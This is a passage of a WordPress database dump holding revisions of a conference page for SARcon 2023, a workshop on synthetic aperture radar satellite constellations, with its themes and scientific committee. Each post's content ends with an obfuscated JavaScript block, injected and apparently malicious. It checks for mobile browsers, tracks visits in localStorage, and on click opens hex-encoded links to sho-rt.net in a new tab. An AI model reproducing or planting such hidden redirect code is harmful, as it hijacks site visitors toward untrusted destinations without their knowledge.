84%);\"][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Prof. Florence Tupin, France</strong></h6>\n<h6>\n<strong>⦁ Prof. Jianya Gong, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Michael Schmitt, Germany</strong></h6>\n<h6>\n<strong>⦁ Prof. Chibiao Ding, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Yunkai Deng, China</strong></h6>\n<h6>\n<strong>⦁ Assoc. Prof. Dr. Nusret Demir, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Rafael Rosa, Brazil</strong></h6>\n<h6>\n<strong>⦁ Dr. Füsun Balik Sanli, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Bahaa Mohamadi, Egypt</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 18:09:47','2022-10-13 18:09:47','',2736,'https://gsw2023.com/?p=2761',0,'revision','',0),
(2762,1,'2022-10-13 18:16:09','2022-10-13 18:16:09','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_carousel order=\"asc\" posts_offset=\"0\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" arrow_bg_width=\"36x\" arrow_border_width=\"0px\" r_arrow_icon_paddings=\"0px 0px 0px 0px\" r_arrow_v_offset=\"0px\" l_arrow_icon_paddings=\"0px 0px 0px 0px\" l_arrow_v_offset=\"0px\" category=\"47\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"full\" parallax_content=\"parallax_content_value\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #E3E3E3), color-stop(84%, #EBEBEB));background: -moz-linear-gradient(top,#E3E3E3 0%,#EBEBEB 84%);background: -webkit-linear-gradient(top,#E3E3E3 0%,#EBEBEB 84%);background: -o-linear-gradient(top,#E3E3E3 0%,#EBEBEB 84%);background: -ms-linear-gradient(top,#E3E3E3 0%,#EBEBEB 84%);background: linear-gradient(top,#E3E3E3 0%,#EBEBEB 84%);\"][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Prof. Florence Tupin, France</strong></h6>\n<h6>\n<strong>⦁ Prof. Jianya Gong, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Michael Schmitt, Germany</strong></h6>\n<h6>\n<strong>⦁ Prof. Chibiao Ding, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Yunkai Deng, China</strong></h6>\n<h6>\n<strong>⦁ Assoc. Prof. Dr. Nusret Demir, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Rafael Rosa, Brazil</strong></h6>\n<h6>\n<strong>⦁ Dr. Füsun Balik Sanli, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Bahaa Mohamadi, Egypt</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and 